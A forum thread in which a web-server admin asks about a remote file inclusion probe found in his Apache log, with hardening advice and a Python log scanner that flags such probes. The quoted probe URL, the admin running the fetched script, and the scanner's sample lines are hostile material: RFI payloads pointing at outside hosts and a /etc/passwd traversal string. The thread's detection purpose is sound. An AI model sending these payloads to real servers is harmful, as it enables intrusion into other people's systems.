I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - 126.96.36.199 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" repeated 4 times. Just the time and date are different. I copied response.txt to my web server and ran it. This is what was displayed:
uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers) 0sirys was here ..
uname -a: Linux zombie13 188.8.131.52-0.1-default #1 SMP 2008-10-14 22:17:43 +0200 x86_64
id: uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers)
free: 5.13 Gb
used: 44.13 Gb
total: 49.26 Gb
Does this information present a security risk? If so what may be done to prevent attacks using this information.
I have blocked the ip range 184.108.40.206 - 220.127.116.11 to prevent further attempts coming from domainfactory GmbH.
I suppose the first thing that security geeks like me ask is, is it necessary for you to support file uploads on your server?
Any services that are not ESSENTIAL to operation should be disabled on a public-facing box.
Also, are you running the latest versions of both Apache AND PHP? (I mean that when you check your distro's update-manager you find no updates necessary.)
These zombie-makers come out of the woodwork from time to time and it's necessary to deal with them ONLY when they can affect a service you need. If you don't need it, just disable the service and update.
http://www.jkijmond.nl is now fixed. Usually, such sites are compromised (where the owner is unaware) and hosting/serving malware as a third party.
I'm sure you'll see tons of such traffic in your logs (I do). As long as you know that you don't allow uploads, you're ok (but check from time to time anyways).
Oh, and one thing I'd NEVER do is download questionable code and execute it, especially without viewing and assessing the code first. Fortunately, it appears that that script was just gathering data. Someone who may be keeping a list of possible hosts to attack could use that type of data.
I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - ....
Does this information present a security risk? If so what may be done to ...
I have blocked the ip range 18.104.22.168 - 22.214.171.124 to prevent further ...
TIA for your advice,
Thank you for your feedback. Currently, I do not allow file uploads. Updates are done regularly, i.e. when I am notified updates are available. One discovery is my current router does not allow me to block specific ip addresses or ip ranges. The one that allows me to do that blocks my VOIP phone line.
Now that I am learning to create web sites with PHP and MySQL file uploads may be allowed in the future. My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.
Howdy again, I just got another update email for this post and I re-read from the beginning...
Notwithstanding the fact that, ultimately, this may be originating at some zombie attempting an upload exploit, remember the critical element here... The response code: 404 (Your server told it to piss off)
Naturally, zombies just roam through the web tapping everybody's door to see who was dumb enough to leave the key in the lock outside. I've had one server running three virtual hosts and they each have an entry in their log (after only one day of operating!!!) from some "Morpheus F**king Scanner" (no joke, that was the actual text in the log) zombie.
But the response codes are all 404s so there's no risk to me.
Keep patched, disable unnecessary services, and keep an eye on those logs for things that DON'T go 404...
Oh, and as unSpawn asked, please do submit any tweaks you have for scripting security, etc.
Excellent posting, btw, everyone, this is one of the first security-related threads I've seen that DIDN'T go all crazy with advice to block everyone's ip and start wearing foil hats.
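The advice above boils down to: the request in the OP's log is a remote file inclusion probe (a query parameter whose value is a URL, aimed at a script that does include($_GET[...])), and the thing to watch for is the same kind of probe that does NOT come back 404. As an added example, not code from anyone in this thread, here is a small scanner that parses Apache combined-format access_log lines, URL-decodes the request target, tags inclusion probes (remote URLs and ../ traversal), and separates the ones your server answered with something other than 404. The log lines are constructed for the example, modelled on the entry quoted in the first post; the IPs, hostnames and paths in them are placeholders, not real hosts.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format, modelled on the
# request quoted in the thread. IPs, hostnames and paths are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://malware.example/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" "-"
192.0.2.10 - - [10/Dec/2008:06:14:02 -0500] "GET /shop/includes/include_once.php?include_file=http://malware.example/jl/response.txt%0D?? HTTP/1.1" 200 512 "-" "-"
198.51.100.7 - - [10/Dec/2008:07:01:11 -0500] "GET /index.php?page=about HTTP/1.1" 200 4211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2008:07:01:12 -0500] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2008:07:05:40 -0500] "GET /index.php?page=ftp://evil.example/shell.txt HTTP/1.1" 500 0 "-" "-"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A query parameter whose value is an absolute URL or a PHP stream wrapper is
# the classic remote file inclusion probe (include($_GET['x']) with
# allow_url_include / allow_url_fopen turned on).
RFI_RE = re.compile(r'=\s*(?:https?|ftp|php|data)://', re.IGNORECASE)
# Directory traversal / local file inclusion attempts.
LFI_RE = re.compile(r'(?:\.\./|/etc/passwd|/proc/self/environ)', re.IGNORECASE)


def parse_line(line):
    """Parse one access_log line into a dict, or None if it is not a log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Decode %0D, %2E%2E etc. before matching so encoded probes are not missed.
    entry["target"] = unquote(entry["target"])
    return entry


def classify(entry):
    """Return tags describing why the request looks like an inclusion probe."""
    tags = []
    if RFI_RE.search(entry["target"]):
        tags.append("rfi")
    if LFI_RE.search(entry["target"]):
        tags.append("lfi")
    return tags


def scan(log_text):
    """Return (attempts, hits): every inclusion probe found, and the subset the
    server did NOT answer with 404, i.e. the target script exists and the
    response deserves a closer look."""
    attempts, hits = [], []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if not tags:
            continue
        entry["tags"] = tags
        attempts.append(entry)
        if entry["status"] != 404:
            hits.append(entry)
    return attempts, hits


if __name__ == "__main__":
    attempts, hits = scan(SAMPLE_LOG)
    print(f"{len(attempts)} inclusion probes, {len(hits)} answered with something other than 404")
    for e in hits:
        print(f"{e['ip']} {e['status']} {','.join(e['tags'])} {e['target']}")
```

Run it against the real file by passing the contents of your access_log to scan() (on openSUSE the Apache log typically lives under /var/log/apache2/, but check your own configuration). The 404 entries tell you the scanner was only guessing at paths; a 200 or 500 on an "rfi" line means a script of that name really exists on your box and you should read it for an include() of user-controlled input, and confirm allow_url_include is Off in php.ini.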
Thanks for the heads-up regarding security. This is why I am taking things slowly, building the web apps with security in mind while researching the security issues involved in hosting on a public-facing server.